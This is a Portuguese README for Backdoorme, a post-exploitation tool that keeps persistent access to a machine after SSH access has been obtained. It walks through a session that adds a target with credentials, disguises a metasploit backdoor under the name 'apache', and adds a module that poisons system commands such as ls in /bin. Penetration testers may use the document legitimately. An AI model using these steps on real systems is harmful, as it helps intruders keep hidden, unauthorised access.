
utilitário poderoso de auto-backdoor
Ferramentas como metasploit são ótimas para explorar computadores, mas o que acontece depois que você obteve acesso a um computador? O backdoorme responde a essa pergunta liberando uma série de backdoors para estabelecer persistência por longos períodos de tempo.
Uma vez que uma conexão SSH foi estabelecida com o alvo, os pontos fortes do Backdoorme podem ser aproveitados. Infelizmente, o Backdoorme não é uma ferramenta para obter acesso root – apenas manter esse acesso depois de obtido.
Por favor, use o Backdoorme apenas com permissão explícita – por favor, não invada sem perguntar.
O Backdoorme é dividido em duas partes: backdoors e módulos.
Backdoors são pequenos trechos de código que escutam em uma porta e redirecionam para um interpretador, como bash. Existem muitos backdoors escritos em várias linguagens para oferecer variedade.
Os módulos tornam os backdoors mais potentes executando-os com mais frequência, por exemplo, a cada poucos minutos ou sempre que o computador inicializa. Isso ajuda a estabelecer persistência.
Demonstração:
Para iniciar o backdoorme, primeiro certifique-se de ter as dependências necessárias.
Para Python 3.5+:
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
Para Python 2.7:
$ sudo python dependencies.py
Iniciando o backdoorme:
$ python master.py
Para adicionar um alvo:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>
Para usar um backdoor, simplesmente execute a palavra-chave "use".
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
A partir daí, você pode definir opções pertinentes ao backdoor. Execute "show options" ou "help" para ver uma lista de parâmetros que podem ser configurados. Para definir uma opção, simplesmente use a palavra-chave "set".
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...
Como no metasploit, os backdoors são organizados por categoria.
Cada backdoor tem a capacidade de ter módulos adicionais aplicados para torná-lo mais potente. Para adicionar um módulo, simplesmente use a palavra-chave "add".
(msf) >> add poison
+ Poison module added
Cada módulo possui parâmetros adicionais que podem ser personalizados, e se "help" for executado novamente, você pode ver ou definir quaisquer opções adicionais.
(msf) >> help
...
Poison module options:
Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False
Os módulos atualmente habilitados incluem:
O Backdoorme suporta múltiplos alvos diferentes simultaneamente, organizados por número quando inseridos. O núcleo mantém um alvo "atual", para o qual qualquer novo backdoor será direcionado por padrão. Para alternar manualmente entre alvos, simplesmente adicione o número do alvo após o comando: "use metasploit 2" preparará o backdoor metasploit contra o segundo alvo. Execute "list" para ver a lista de alvos atuais, se a conexão está aberta ou fechada e quais backdoors e módulos estão disponíveis.
O Backdoorme ainda está em sua fase inicial! Sinta-se à vontade para contribuir com o projeto – simplesmente faça um fork, faça suas alterações e envie um pull request. Tem uma ideia para um backdoor matador, ou algo que possamos melhorar? Abra uma issue e adicionaremos o mais rápido possível! Envie-nos um e-mail para [email protected] com qualquer dúvida.
Se desejar adicionar seu próprio backdoor, siga as instruções fornecidas no arquivo backdoorme/backdoors/template.py.
Se desejar adicionar seu próprio módulo, siga as instruções fornecidas no arquivo backdoorme/modules/template.py.
Guia de referência para desenvolvedores: